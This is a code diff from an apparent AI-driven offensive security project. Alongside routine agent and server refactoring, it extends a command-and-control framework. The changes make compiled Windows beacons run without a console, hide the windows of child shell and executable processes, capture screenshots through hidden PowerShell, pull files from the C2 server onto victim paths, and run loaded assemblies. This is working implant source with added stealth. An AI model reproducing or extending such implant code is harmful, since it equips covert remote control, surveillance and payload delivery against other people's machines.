func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建小结果
smallResult := &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "Small result content",
},
},
IsError: false,
}
// 设置较大的阈值
agent.mu.Lock()
agent.largeResultThreshold = 100000 // 100KB
agent.mu.Unlock()
// 格式化结果
var resultText strings.Builder
for _, content := range smallResult.Content {
resultText.WriteString(content.Text)
resultText.WriteString("\n")
}
resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果
agent.mu.RLock()
threshold := agent.largeResultThreshold
storage := agent.resultStorage
agent.mu.RUnlock()
if resultSize > threshold && storage != nil {
t.Fatal("小结果不应该被保存")
}
// 小结果应该直接返回
if resultSize <= threshold {
// 这是预期的行为
if resultStr == "" {
t.Fatal("小结果应该直接返回,不应该为空")
}
}
}
func TestAgent_SetResultStorage(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建新的存储
tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405"))
newStorage, err := storage.NewFileResultStorage(tmpDir, zap.NewNop())
if err != nil {
t.Fatalf("创建新存储失败: %v", err)
}
// 设置新存储
agent.SetResultStorage(newStorage)
// 验证存储已更新
agent.mu.RLock()
currentStorage := agent.resultStorage
agent.mu.RUnlock()
if currentStorage != newStorage {
t.Fatal("存储未正确更新")
}
// 清理
os.RemoveAll(tmpDir)
} }
func TestAgent_NewAgent_DefaultValues(t *testing.T) { func TestAgent_NewAgent_DefaultValues(t *testing.T) {
@@ -243,14 +43,6 @@ func TestAgent_NewAgent_DefaultValues(t *testing.T) {
if agent.maxIterations != 30 { if agent.maxIterations != 30 {
t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations) t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock()
threshold := agent.largeResultThreshold
agent.mu.RUnlock()
if threshold != 50*1024 {
t.Errorf("默认阈值不匹配。期望: %d, 实际: %d", 50*1024, threshold)
}
} }
func TestAgent_NewAgent_CustomConfig(t *testing.T) { func TestAgent_NewAgent_CustomConfig(t *testing.T) {
@@ -264,9 +56,7 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 20, MaxIterations: 20,
LargeResultThreshold: 100 * 1024, // 100KB
ResultStorageDir: "custom_tmp",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15) agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15)
@@ -274,12 +64,4 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
if agent.maxIterations != 15 { if agent.maxIterations != 15 {
t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations) t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock()
threshold := agent.largeResultThreshold
agent.mu.RUnlock()
if threshold != 100*1024 {
t.Errorf("阈值不匹配。期望: %d, 实际: %d", 100*1024, threshold)
}
} }
+10 -27
View File
@@ -28,7 +28,6 @@ import (
"cyberstrike-ai/internal/robot" "cyberstrike-ai/internal/robot"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/skillpackage" "cyberstrike-ai/internal/skillpackage"
"cyberstrike-ai/internal/storage"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"github.com/google/uuid" "github.com/google/uuid"
@@ -130,23 +129,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
externalMCPMgr.StartAllEnabled() externalMCPMgr.StartAllEnabled()
} }
// 初始化结果存储
resultStorageDir := "tmp"
if cfg.Agent.ResultStorageDir != "" {
resultStorageDir = cfg.Agent.ResultStorageDir
}
// 确保存储目录存在
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
return nil, fmt.Errorf("创建结果存储目录失败: %w", err)
}
// 创建结果存储实例
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
if err != nil {
return nil, fmt.Errorf("初始化结果存储失败: %w", err)
}
// 创建Agent // 创建Agent
maxIterations := cfg.Agent.MaxIterations maxIterations := cfg.Agent.MaxIterations
if maxIterations <= 0 { if maxIterations <= 0 {
@@ -155,12 +137,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations) agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations)
agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode) agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode)
// 设置结果存储到Agent
agent.SetResultStorage(resultStorage)
// 设置结果存储到Executor(用于查询工具)
executor.SetResultStorage(resultStorage)
// 初始化知识库模块(如果启用) // 初始化知识库模块(如果启用)
var knowledgeManager *knowledge.Manager var knowledgeManager *knowledge.Manager
var knowledgeRetriever *knowledge.Retriever var knowledgeRetriever *knowledge.Retriever
@@ -315,6 +291,14 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath) skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath)
log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API", zap.String("skillsDir", skillsDir)) log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API", zap.String("skillsDir", skillsDir))
configDir := filepath.Dir(configPath) configDir := filepath.Dir(configPath)
plantaskRel := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.PlantaskRelDir)
if plantaskRel == "" {
plantaskRel = ".eino/plantask"
}
plantaskBase := filepath.Join(skillsDir, plantaskRel)
// Match eino_adk_run_loop: checkpoint_dir is used as configured (relative to process CWD when not absolute).
checkpointBase := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.CheckpointDir)
db.SetEinoConversationDirs(plantaskBase, checkpointBase)
agent.SetPromptBaseDir(configDir) agent.SetPromptBaseDir(configDir)
agentsDir := cfg.AgentsDir agentsDir := cfg.AgentsDir
@@ -386,7 +370,7 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
conversationHandler.SetAudit(auditSvc) conversationHandler.SetAudit(auditSvc)
auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger) auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger)
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger) robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler) openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, conversationHandler, agentHandler)
// 创建 App 实例(部分字段稍后填充) // 创建 App 实例(部分字段稍后填充)
app := &App{ app := &App{
@@ -1075,6 +1059,7 @@ func setupRoutes(
protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability) protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability)
// 项目管理与事实黑板 // 项目管理与事实黑板
protected.GET("/projects/dashboard-summary", projectHandler.GetDashboardSummary)
protected.GET("/projects", projectHandler.ListProjects) protected.GET("/projects", projectHandler.ListProjects)
protected.POST("/projects", projectHandler.CreateProject) protected.POST("/projects", projectHandler.CreateProject)
protected.GET("/projects/:id/stats", projectHandler.GetProjectStats) protected.GET("/projects/:id/stats", projectHandler.GetProjectStats)
@@ -1083,8 +1068,6 @@ func setupRoutes(
protected.PUT("/projects/:id", projectHandler.UpdateProject) protected.PUT("/projects/:id", projectHandler.UpdateProject)
protected.DELETE("/projects/:id", projectHandler.DeleteProject) protected.DELETE("/projects/:id", projectHandler.DeleteProject)
protected.GET("/projects/:id/facts", projectHandler.ListFacts) protected.GET("/projects/:id/facts", projectHandler.ListFacts)
protected.GET("/projects/:id/facts/:factId/previous-version", projectHandler.GetFactPreviousVersion)
protected.GET("/projects/:id/facts/:factId/versions", projectHandler.ListFactVersions)
protected.POST("/projects/:id/facts", projectHandler.CreateFact) protected.POST("/projects/:id/facts", projectHandler.CreateFact)
protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact) protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact)
protected.DELETE("/projects/:id/facts/:factId", projectHandler.DeleteFact) protected.DELETE("/projects/:id/facts/:factId", projectHandler.DeleteFact)
+19 -2
View File
@@ -47,6 +47,24 @@ func (l *oneConnListener) Accept() (net.Conn, error) {
func (l *oneConnListener) Close() error { return nil } func (l *oneConnListener) Close() error { return nil }
func (l *oneConnListener) Addr() net.Addr { return l.addr } func (l *oneConnListener) Addr() net.Addr { return l.addr }
// httpServerForTLSConn 从已有 Server 复制可服务字段,用于已握手 TLS 连接上的 HTTP 服务。
// 不能复制整个 http.Server(内含 atomic/noCopy 字段)。
func httpServerForTLSConn(src *http.Server) *http.Server {
return &http.Server{
Handler: src.Handler,
DisableGeneralOptionsHandler: src.DisableGeneralOptionsHandler,
ReadTimeout: src.ReadTimeout,
ReadHeaderTimeout: src.ReadHeaderTimeout,
WriteTimeout: src.WriteTimeout,
IdleTimeout: src.IdleTimeout,
MaxHeaderBytes: src.MaxHeaderBytes,
ConnState: src.ConnState,
ErrorLog: src.ErrorLog,
BaseContext: src.BaseContext,
ConnContext: src.ConnContext,
}
}
func isTLSHandshakeRecord(b byte) bool { func isTLSHandshakeRecord(b byte) bool {
return b == 0x16 return b == 0x16
} }
@@ -172,8 +190,7 @@ func (m *mainServerMux) serveHTTPS(pc *peekedConn, localAddr net.Addr) {
} }
} }
plain := *srv plain := httpServerForTLSConn(srv)
plain.TLSConfig = nil
ocl := &oneConnListener{conn: tlsConn, addr: localAddr} ocl := &oneConnListener{conn: tlsConn, addr: localAddr}
if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) { if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
m.logger.Debug("HTTPS 连接处理结束", zap.Error(err)) m.logger.Debug("HTTPS 连接处理结束", zap.Error(err))
+2 -2
View File
@@ -293,8 +293,8 @@ func registerListVulnerabilitiesTool(mcpServer *mcp.Server, db *database.DB, log
}, },
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "按状态筛选:open、confirmed、fixed、false_positive", "description": "按状态筛选:open、confirmed、fixed、false_positive、ignored",
"enum": []string{"open", "confirmed", "fixed", "false_positive"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"q": map[string]interface{}{ "q": map[string]interface{}{
"type": "string", "type": "string",
+48
View File
@@ -0,0 +1,48 @@
package c2
import (
"encoding/base64"
"strings"
"unicode/utf8"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
)
// NormalizeConsoleOutput 将 implant/Shell 原始控制台字节转为 UTF-8 文本。
// osTag 来自会话的 os 字段(如 windows / Windows 10);空值时按 auto 处理。
func NormalizeConsoleOutput(raw []byte, osTag string) string {
if len(raw) == 0 {
return ""
}
osTag = strings.ToLower(strings.TrimSpace(osTag))
isWindows := strings.Contains(osTag, "windows")
if utf8.Valid(raw) {
return string(raw)
}
if isWindows {
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
return string(out)
}
}
// 非 Windows 或解码失败:GB18030 兜底(覆盖 GBK
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
return string(out)
}
return string(raw)
}
// ResolveTaskResultText 合并 beacon 回传的 Output/OutputB64(及 Error/ErrorB64),按会话 OS 解码。
func ResolveTaskResultText(plain, b64, sessionOS string) string {
if strings.TrimSpace(b64) != "" {
raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
if err == nil {
return NormalizeConsoleOutput(raw, sessionOS)
}
}
if plain == "" {
return ""
}
return NormalizeConsoleOutput([]byte(plain), sessionOS)
}
+51
View File
@@ -0,0 +1,51 @@
package c2
import (
"encoding/base64"
"testing"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
)
func mustGBK(t *testing.T, s string) []byte {
t.Helper()
out, _, err := transform.Bytes(simplifiedchinese.GBK.NewEncoder(), []byte(s))
if err != nil {
t.Fatal(err)
}
return out
}
func TestNormalizeConsoleOutput_WindowsGBK(t *testing.T) {
raw := mustGBK(t, "中文测试")
got := NormalizeConsoleOutput(raw, "windows")
if got != "中文测试" {
t.Fatalf("got %q want 中文测试", got)
}
}
func TestNormalizeConsoleOutput_UTF8Passthrough(t *testing.T) {
raw := []byte("hello 世界")
got := NormalizeConsoleOutput(raw, "linux")
if got != "hello 世界" {
t.Fatalf("got %q", got)
}
}
func TestResolveTaskResultText_PrefersB64(t *testing.T) {
raw := mustGBK(t, "采购订单")
b64 := base64.StdEncoding.EncodeToString(raw)
got := ResolveTaskResultText("", b64, "windows")
if got != "采购订单" {
t.Fatalf("got %q", got)
}
}
func TestResolveTaskResultText_PlainFallback(t *testing.T) {
raw := mustGBK(t, "测试")
got := ResolveTaskResultText(string(raw), "", "windows")
if got != "测试" {
t.Fatalf("got %q", got)
}
}
+1
View File
@@ -367,6 +367,7 @@ func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Requ
} }
prefix := l.cfg.BeaconFilePath prefix := l.cfg.BeaconFilePath
taskID := strings.TrimPrefix(r.URL.Path, prefix) taskID := strings.TrimPrefix(r.URL.Path, prefix)
taskID = strings.TrimSuffix(taskID, ".bin")
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") { if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
l.disguisedReject(w) l.disguisedReject(w)
return return
+100
View File
@@ -2,10 +2,12 @@ package c2
import ( import (
"bytes" "bytes"
"encoding/base64"
"encoding/json" "encoding/json"
"io" "io"
"net" "net"
"net/http" "net/http"
"os"
"path/filepath" "path/filepath"
"strconv" "strconv"
"strings" "strings"
@@ -127,3 +129,101 @@ func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
} }
}) })
} }
func TestHTTPBeaconListener_HandleFileServe(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "c2.sqlite")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal(err)
}
port := lnPick.Addr().(*net.TCPAddr).Port
_ = lnPick.Close()
keyB64, err := GenerateAESKey()
if err != nil {
t.Fatal(err)
}
token := "test-implant-token-file"
lid := "l_testhttpfile01"
rec := &database.C2Listener{
ID: lid,
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: port,
EncryptionKey: keyB64,
ImplantToken: token,
Status: "stopped",
ConfigJSON: `{"beacon_file_path":"/file/"}`,
CreatedAt: time.Now(),
}
if err := db.CreateC2Listener(rec); err != nil {
t.Fatal(err)
}
store := filepath.Join(tmp, "c2store")
m := NewManager(db, zap.NewNop(), store)
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
if _, err := m.StartListener(lid); err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = m.StopListener(lid) })
fileID := "f_testfile123"
downDir := filepath.Join(store, "downstream")
if err := os.MkdirAll(downDir, 0o755); err != nil {
t.Fatal(err)
}
want := []byte("upload-payload-bytes")
if err := os.WriteFile(filepath.Join(downDir, fileID+".bin"), want, 0o644); err != nil {
t.Fatal(err)
}
base := "http://127.0.0.1:" + strconv.Itoa(port)
client := &http.Client{Timeout: 5 * time.Second}
for _, path := range []string{"/file/" + fileID, "/file/" + fileID + ".bin"} {
t.Run(path, func(t *testing.T) {
req, _ := http.NewRequest(http.MethodGet, base+path, nil)
req.Header.Set("X-Implant-Token", token)
resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
b, _ := io.ReadAll(resp.Body)
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
}
raw, err := io.ReadAll(resp.Body)
if err != nil {
t.Fatal(err)
}
plain, err := DecryptAESGCM(keyB64, string(raw))
if err != nil {
t.Fatal(err)
}
var out struct {
FileData string `json:"file_data"`
}
if err := json.Unmarshal(plain, &out); err != nil {
t.Fatal(err)
}
got, err := base64.StdEncoding.DecodeString(out.FileData)
if err != nil {
t.Fatal(err)
}
if !bytes.Equal(got, want) {
t.Fatalf("got %q want %q", got, want)
}
})
}
}
+12 -4
View File
@@ -638,10 +638,18 @@ func (m *Manager) IngestTaskResult(report TaskResultReport) error {
status = string(TaskFailed) status = string(TaskFailed)
} }
duration := endedAt.Sub(startedAt).Milliseconds() duration := endedAt.Sub(startedAt).Milliseconds()
sessionOS := ""
if sess, serr := m.db.GetC2Session(t.SessionID); serr == nil && sess != nil {
sessionOS = sess.OS
}
resultText := ResolveTaskResultText(report.Output, report.OutputB64, sessionOS)
errText := ResolveTaskResultText(report.Error, report.ErrorB64, sessionOS)
upd := database.C2TaskUpdate{ upd := database.C2TaskUpdate{
Status: &status, Status: &status,
ResultText: &report.Output, ResultText: &resultText,
Error: &report.Error, Error: &errText,
StartedAt: &startedAt, StartedAt: &startedAt,
CompletedAt: &endedAt, CompletedAt: &endedAt,
DurationMS: &duration, DurationMS: &duration,
@@ -661,8 +669,8 @@ func (m *Manager) IngestTaskResult(report TaskResultReport) error {
return err return err
} }
t.Status = status t.Status = status
t.ResultText = report.Output t.ResultText = resultText
t.Error = report.Error t.Error = errText
level := "info" level := "info"
msg := fmt.Sprintf("任务完成: %s", t.TaskType) msg := fmt.Sprintf("任务完成: %s", t.TaskType)
+18 -5
View File
@@ -160,6 +160,18 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
} }
f.Close() f.Close()
// 平台相关辅助源文件(如无窗口子进程)
for _, name := range []string{"proc_hide_windows.go", "proc_hide_unix.go"} {
helperSrc := filepath.Join(b.tmplDir, name+".tmpl")
helperData, readErr := os.ReadFile(helperSrc)
if readErr != nil {
return nil, fmt.Errorf("read helper %s: %w", name, readErr)
}
if writeErr := os.WriteFile(filepath.Join(workDir, name), helperData, 0644); writeErr != nil {
return nil, fmt.Errorf("write helper %s: %w", name, writeErr)
}
}
// 交叉编译 // 交叉编译
binName := strings.TrimSpace(in.OutputName) binName := strings.TrimSpace(in.OutputName)
if binName == "" { if binName == "" {
@@ -174,15 +186,16 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
return nil, fmt.Errorf("mkdir output: %w", err) return nil, fmt.Errorf("mkdir output: %w", err)
} }
absSrcPath, err := filepath.Abs(srcPath)
if err != nil {
return nil, fmt.Errorf("abs source path: %w", err)
}
absBinPath, err := filepath.Abs(binPath) absBinPath, err := filepath.Abs(binPath)
if err != nil { if err != nil {
return nil, fmt.Errorf("abs output path: %w", err) return nil, fmt.Errorf("abs output path: %w", err)
} }
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath) ldflags := "-s -w -buildid="
if goos == "windows" {
// 无控制台窗口运行 beacon 本体
ldflags += " -H windowsgui"
}
cmd := exec.Command("go", "build", "-ldflags", ldflags, "-trimpath", "-o", absBinPath, ".")
cmd.Env = append(os.Environ(), cmd.Env = append(os.Environ(),
"GOOS="+goos, "GOOS="+goos,
"GOARCH="+goarch, "GOARCH="+goarch,
+52 -22
View File
@@ -45,6 +45,7 @@ import (
"strings" "strings"
"sync" "sync"
"time" "time"
"unicode/utf8"
) )
// 编译期注入常量(text/template 替换) // 编译期注入常量(text/template 替换)
@@ -101,7 +102,9 @@ type TaskReport struct {
TaskID string `json:"task_id"` TaskID string `json:"task_id"`
Success bool `json:"success"` Success bool `json:"success"`
Output string `json:"output,omitempty"` Output string `json:"output,omitempty"`
OutputB64 string `json:"output_b64,omitempty"`
Error string `json:"error,omitempty"` Error string `json:"error,omitempty"`
ErrorB64 string `json:"error_b64,omitempty"`
BlobBase64 string `json:"blob_b64,omitempty"` BlobBase64 string `json:"blob_b64,omitempty"`
BlobSuffix string `json:"blob_suffix,omitempty"` BlobSuffix string `json:"blob_suffix,omitempty"`
StartedAt int64 `json:"started_at"` StartedAt int64 `json:"started_at"`
@@ -326,16 +329,7 @@ func handleTaskSyncTCP(conn net.Conn, env TaskEnv) {
defer func() { tcpTaskConn = nil }() defer func() { tcpTaskConn = nil }()
start := time.Now() start := time.Now()
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
report := TaskReport{ report := buildTaskReport(env.TaskID, output, errMsg, blobB64, blobSuffix, start, time.Now())
TaskID: env.TaskID,
Success: errMsg == "",
Output: output,
Error: errMsg,
BlobBase64: blobB64,
BlobSuffix: blobSuffix,
StartedAt: start.UnixMilli(),
EndedAt: time.Now().UnixMilli(),
}
tcpReportResult(conn, report) tcpReportResult(conn, report)
} }
@@ -367,7 +361,8 @@ func fetchC2FileByID(fileID string) ([]byte, error) {
if tcpTaskConn != nil { if tcpTaskConn != nil {
return tcpFetchEncryptedFile(tcpTaskConn, fileID) return tcpFetchEncryptedFile(tcpTaskConn, fileID)
} }
url := fmt.Sprintf("%s%s%s.bin", serverURL, filePath, fileID) // 服务端 handleFileServe 会在 downstream/<file_id>.bin 读取;URL 路径应为 /file/<file_id>,勿重复 .bin
url := fmt.Sprintf("%s%s%s", serverURL, filePath, fileID)
req, _ := http.NewRequest("GET", url, nil) req, _ := http.NewRequest("GET", url, nil)
req.Header.Set("User-Agent", userAgent) req.Header.Set("User-Agent", userAgent)
req.Header.Set("X-Implant-Token", implantToken) req.Header.Set("X-Implant-Token", implantToken)
@@ -635,20 +630,39 @@ func decryptGCM(cipherText string) ([]byte, error) {
return gcm.Open(nil, nonce, ct, nil) return gcm.Open(nil, nonce, ct, nil)
} }
func encodeReportText(s string) (plain, b64 string) {
if s == "" {
return "", ""
}
b := []byte(s)
if utf8.Valid(b) {
return s, ""
}
return "", base64.StdEncoding.EncodeToString(b)
}
func buildTaskReport(taskID, output, errMsg, blobB64, blobSuffix string, start, end time.Time) TaskReport {
outText, outB64 := encodeReportText(output)
errText, errB64 := encodeReportText(errMsg)
return TaskReport{
TaskID: taskID,
Success: errMsg == "",
Output: outText,
OutputB64: outB64,
Error: errText,
ErrorB64: errB64,
BlobBase64: blobB64,
BlobSuffix: blobSuffix,
StartedAt: start.UnixMilli(),
EndedAt: end.UnixMilli(),
}
}
func handleTaskAsync(env TaskEnv) { func handleTaskAsync(env TaskEnv) {
defer func() { _ = recover() }() defer func() { _ = recover() }()
start := time.Now() start := time.Now()
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
report := TaskReport{ report := buildTaskReport(env.TaskID, output, errMsg, blobB64, blobSuffix, start, time.Now())
TaskID: env.TaskID,
Success: errMsg == "",
Output: output,
Error: errMsg,
BlobBase64: blobB64,
BlobSuffix: blobSuffix,
StartedAt: start.UnixMilli(),
EndedAt: time.Now().UnixMilli(),
}
reportResult(report) reportResult(report)
} }
@@ -715,6 +729,7 @@ func runWithTimeout(cmdStr string, timeoutSec int) (string, error) {
timeoutSec = 60 timeoutSec = 60
} }
cmd := exec.Command(shellByOS(), shellFlag(), cmdStr) cmd := exec.Command(shellByOS(), shellFlag(), cmdStr)
prepareHiddenCmd(cmd)
cwdMu.Lock() cwdMu.Lock()
cmd.Dir = currentCwd cmd.Dir = currentCwd
cwdMu.Unlock() cwdMu.Unlock()
@@ -890,12 +905,26 @@ func taskKillProc(payload map[string]interface{}) (string, string, string, strin
return "killed", "", "", "" return "killed", "", "", ""
} }
func normalizeRemotePath(p string) string {
p = strings.TrimSpace(p)
if p == "" || runtime.GOOS != "windows" {
return p
}
// 控制台可能下发 /d:/path/fileUnix 风格),Windows 需转为 d:\path\file
p = strings.ReplaceAll(p, "\\", "/")
if len(p) >= 3 && p[0] == '/' && p[2] == ':' {
p = p[1:]
}
return filepath.FromSlash(p)
}
func taskUpload(payload map[string]interface{}) (string, string, string, string) { func taskUpload(payload map[string]interface{}) (string, string, string, string) {
remotePath, _ := payload["remote_path"].(string) remotePath, _ := payload["remote_path"].(string)
fileID, _ := payload["file_id"].(string) fileID, _ := payload["file_id"].(string)
if remotePath == "" || fileID == "" { if remotePath == "" || fileID == "" {
return "", "", "", "remote_path or file_id empty" return "", "", "", "remote_path or file_id empty"
} }
remotePath = normalizeRemotePath(remotePath)
data, err := fetchC2FileByID(fileID) data, err := fetchC2FileByID(fileID)
if err != nil { if err != nil {
return "", "", "", err.Error() return "", "", "", err.Error()
@@ -931,7 +960,7 @@ func taskScreenshot() (string, string, string, string) {
b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30)
case "windows": case "windows":
ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())` ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())`
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30) b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"%s\"", ps), 30)
default: default:
return "", "", "", "screenshot not supported on " + runtime.GOOS return "", "", "", "screenshot not supported on " + runtime.GOOS
} }
@@ -1172,6 +1201,7 @@ func taskLoadAssembly(payload map[string]interface{}) (string, string, string, s
cmdArgs = strings.Fields(args) cmdArgs = strings.Fields(args)
} }
cmd := exec.Command(tmpFile, cmdArgs...) cmd := exec.Command(tmpFile, cmdArgs...)
prepareHiddenCmd(cmd)
cwdMu.Lock() cwdMu.Lock()
cmd.Dir = currentCwd cmd.Dir = currentCwd
cwdMu.Unlock() cwdMu.Unlock()
@@ -0,0 +1,9 @@
//go:build !windows
package main
import "os/exec"
func prepareHiddenCmd(cmd *exec.Cmd) {
_ = cmd
}
@@ -0,0 +1,18 @@
//go:build windows
package main
import (
"os/exec"
"syscall"
)
// prepareHiddenCmd 避免子进程弹出控制台窗口(cmd / powershell / 临时 exe 等)。
func prepareHiddenCmd(cmd *exec.Cmd) {
if cmd == nil {
return
}
// 仅用 HideWindow:等价于 CREATE_NO_WINDOW,且 macOS/Linux 交叉编译 Windows 时
// syscall.CREATE_NO_WINDOW 常量不可用。
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
}
+2
View File
@@ -209,7 +209,9 @@ type TaskResultReport struct {
TaskID string `json:"task_id"` TaskID string `json:"task_id"`
Success bool `json:"success"` Success bool `json:"success"`
Output string `json:"output,omitempty"` Output string `json:"output,omitempty"`
OutputB64 string `json:"output_b64,omitempty"` // 原始控制台字节(base64),避免 JSON 破坏非 UTF-8 输出
Error string `json:"error,omitempty"` Error string `json:"error,omitempty"`
ErrorB64 string `json:"error_b64,omitempty"`
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制 BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png" BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
StartedAt int64 `json:"started_at"` StartedAt int64 `json:"started_at"`
+5 -5
View File
@@ -231,7 +231,7 @@ type MultiAgentEinoMiddlewareConfig struct {
PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"` PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"`
// Reduction truncates/offloads large tool outputs (requires eino local backend for Write). // Reduction truncates/offloads large tool outputs (requires eino local backend for Write).
ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"` ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"`
